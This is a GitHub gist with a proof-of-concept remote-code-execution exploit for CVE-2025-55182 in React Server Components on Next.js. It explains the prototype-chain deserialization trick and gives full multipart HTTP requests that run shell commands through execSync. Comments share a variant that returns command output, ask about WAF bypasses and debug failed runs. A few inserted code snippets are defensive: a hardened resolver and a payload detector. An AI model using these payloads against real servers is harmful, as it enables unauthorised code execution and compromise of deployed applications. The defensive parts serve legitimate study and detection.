@maple3142
Last active December 15, 2025 08:40
CVE-2025-55182 React Server Components RCE POC

POC for CVE-2025-55182 that works on Next.js 16.0.6

Core idea

Use the $@ deserialization to obtain a reference to a Chunk object, and place Chunk.prototype.then as the then property of the root object. When the root object is awaited/resolved, that then is invoked with the root object as this, i.e. the root object is treated as the chunk.

By setting status to RESOLVED_MODEL, we can now get initializeModelChunk to run on a fake chunk that is completely under our control. This is particularly useful because initializeModelChunk and its related functions call many methods on the chunk._response object.
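The following is an added example, not code from the gist or from React: a toy model of how a reference such as "$1:__proto__:then" is resolved when the resolver walks user-controlled keys with plain property access, next to a hardened resolver that refuses prototype-chain keys. Chunk, resolveReferenceNaive, resolveReferenceSafe and the chunk table are all assumed names.

```javascript
// Added example (not the gist's or React's code): why resolving a path like
// "1:__proto__:then" with plain property access hands out framework
// internals, and one way a resolver can refuse to do that.

// Stand-in for React's Chunk class; only the shape matters here.
class Chunk {
  constructor(response, status, value) {
    this._response = response;
    this.status = status;
    this.value = value;
  }
  // Stand-in for Chunk.prototype.then: the real one dispatches on this.status
  // (e.g. RESOLVED_MODEL -> initializeModelChunk(this)); this only records it.
  then(resolve) {
    resolve({ thenRanOn: this });
  }
}

// Naive resolver: each path segment is plain property access, so "__proto__"
// and "constructor" step into the prototype chain and can reach
// Chunk.prototype.then or the Function constructor.
function resolveReferenceNaive(chunks, ref) {
  const [id, ...path] = ref.split(':');
  let value = chunks.get(Number(id));
  for (const key of path) value = value[key];
  return value;
}

const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Hardened resolver: only follows own properties of objects and rejects the
// well-known prototype-chain keys, so a reference never yields inherited
// functions such as then or constructor.
function resolveReferenceSafe(chunks, ref) {
  const [id, ...path] = ref.split(':');
  let value = chunks.get(Number(id));
  for (const key of path) {
    if (value === null || typeof value !== 'object' || BLOCKED_KEYS.has(key) ||
        !Object.prototype.hasOwnProperty.call(value, key)) {
      throw new Error(`refusing reference "${ref}": "${key}" is not an own property`);
    }
    value = value[key];
  }
  return value;
}

// Constructed chunk table: id 1 holds a Chunk object, as "$@0" would produce.
const chunks = new Map([[1, new Chunk({ _prefix: '' }, 'resolved_model', '{}')]]);
```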

Exploit

The target is to trigger the Blob deserialization, which calls response._formData.get with a payload taken from response._prefix and returns the result directly. So all we need is to set response._formData.get to Function, so that the returned result is a function containing attacker-controlled code; that function is then placed into then again so it gets executed.

POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
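An added detection example, not part of the gist: it splits a multipart/form-data body into its parts and flags the traits of the request above (a "$@" chunk-object reference, a "$<id>:..." reference that walks __proto__/constructor, fake chunk internals such as _response/_formData/_prefix, and status "resolved_model"), which is what a WAF rule or a log pipeline would key on. parseMultipart, scanRscPayload and the sample body are assumptions constructed for the demo.

```javascript
// Added detection example (not from the gist): flag the multipart parts that
// carry the RSC deserialization traits used by this PoC.

// Minimal multipart/form-data splitter; returns [{ name, content }, ...].
function parseMultipart(body, boundary) {
  const parts = [];
  for (const raw of body.replace(/\r\n/g, '\n').split('--' + boundary)) {
    const trimmed = raw.replace(/^\n+|\n+$/g, '');
    if (trimmed === '' || trimmed === '--') continue; // preamble / closing "--"
    const split = trimmed.indexOf('\n\n');
    const headers = split === -1 ? trimmed : trimmed.slice(0, split);
    const content = split === -1 ? '' : trimmed.slice(split + 2);
    const name = (/name="([^"]*)"/.exec(headers) || [])[1] || '';
    parts.push({ name, content });
  }
  return parts;
}

const INDICATORS = [
  // "$@<id>" yields the Chunk object itself instead of its value
  { id: 'chunk-object-reference', re: /"\$@\d+"/ },
  // "$<id>:...:__proto__" / ":constructor" walks the prototype chain
  { id: 'prototype-chain-reference', re: /"\$\d+:[^"]*\b(?:__proto__|constructor|prototype)\b/ },
  // chunk internals that initializeModelChunk would trust
  { id: 'fake-chunk-internals', re: /"(?:_response|_formData|_prefix)"\s*:/ },
  { id: 'resolved-model-status', re: /"status"\s*:\s*"resolved_model"/ },
];

// Returns one finding per (part, indicator) pair; empty for benign bodies.
function scanRscPayload(body, boundary) {
  const findings = [];
  for (const part of parseMultipart(body, boundary)) {
    for (const { id, re } of INDICATORS) {
      if (re.test(part.content)) findings.push({ part: part.name, indicator: id });
    }
  }
  return findings;
}

// Constructed sample shaped like the PoC request (command payload omitted).
const BOUNDARY = '----WebKitFormBoundaryx8jO2oVc6SWP3Sad';
const SAMPLE_BODY = [
  `--${BOUNDARY}`, 'Content-Disposition: form-data; name="0"', '',
  '{"then":"$1:__proto__:then","status":"resolved_model","_response":{"_formData":{"get":"$1:constructor:constructor"}}}',
  `--${BOUNDARY}`, 'Content-Disposition: form-data; name="1"', '', '"$@0"',
  `--${BOUNDARY}--`, '',
].join('\r\n');
const BENIGN_BODY = [
  `--${BOUNDARY}`, 'Content-Disposition: form-data; name="0"', '', '{"name":"alice"}',
  `--${BOUNDARY}--`, '',
].join('\r\n');
```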
@yyyyyyyyuuuuuuu

6

@Coldtears7

This scared me into shutting down my server.

@mlgzackfly

Awesome

@bx33661

bx33661 commented Dec 5, 2025

good job

@Seven1an

Seven1an commented Dec 5, 2025

wow

@0xshrimantyogi

how to extract the Next-Action: x ID

@EvtDanya

EvtDanya commented Dec 5, 2025

is it possible to return the result of executing a command in response to a request? You will not be able to send to the collaborator due to network restrictions.

@N3Dx0o

N3Dx0o commented Dec 5, 2025

E Z one

@0d000721999

Awesome

@Malayke

Malayke commented Dec 5, 2025

is it possible to return the result of executing a command in response to a request?

@EvtDanya
Yes, it's possible to return the result of executing a command in response to a request. You can find the relevant payload here.

@captain-woof

@Malayke That's clever, throwing the output itself as an error.

@sweetsky123

Awesome

@l4rm4nd

l4rm4nd commented Dec 5, 2025

@12joan

12joan commented Dec 5, 2025

Nice work! I wrote this article about a couple of takeaways we can learn from this to avoid making similar mistakes in our own code.

📄 User-controlled Keys Considered Harmful - Two Important Takeaways from CVE-2025-55182

@windbelike

holy shit it works...

@pacmen666

1337

@WallySan

WallySan commented Dec 5, 2025

wow! congratulations!!

@EvtDanya

EvtDanya commented Dec 6, 2025

@EvtDanya Yes, it's possible to return the result of executing a command in response to a request. You can find the relevant payload here.

Nice, thanks :)

@Root1856

Root1856 commented Dec 6, 2025

@Malayke is there any bypass for WAF? like Vercel WAF

@ahmedesmail07

awesome!

@Rhyru9

Rhyru9 commented Dec 6, 2025

1337

@jiangyin14

holy cow

@andreyadrian

Awesome

@arifmales

what happened?

@Codinplus31

it is giving me this error

sent

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Accept-Encoding: gzip, deflate, br
Accept: /
Connection: keep-alive
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 689

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: NEXT_REDIRECT;push;/login?a=${res};307;});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

response

HTTP/1.1 500 Internal Server Error
Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
Cache-Control: no-store, must-revalidate
Content-Type: text/x-component
Date: Wed, 10 Dec 2025 10:27:31 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 301

:N1765362450970.6902
0:{"a":"$@1","f":"","b":"development"}
1:D{"time":6.808100000023842}
1:E{"digest":"1681718686","name":"Error","message":"Command failed: id\n'id' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n","stack":[],"env":"Server","owner":null}

@lokkju

lokkju commented Dec 10, 2025

@Codinplus31

:N1765362450970.6902
0:{"a":"$@1","f":"","b":"development"}
1:D{"time":6.808100000023842}
1:E{"digest":"1681718686","name":"Error","message":"Command failed: id\n'id' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n","stack":[],"env":"Server","owner":null}

That sure looks like the 'id' command that your exploit code is running with execSync() isn't available to your process; try other commands? Perhaps it's not even running on a Linux host?

In fact, "'[command]' is not recognized as an internal or external command" is a classic indicator of a Windows environment.

@Codinplus31

I'm using Windows. How can I get through the error?

@Vitalik-Hakim

Holyshittt!!

@Praiseike

@Codinplus31 you're seeing a Windows batch env error and saying it doesn't work XD

@EvtDanya

Hey!

Is there any PoC with the application/x-www-form-urlencoded content type instead of multipart/form-data??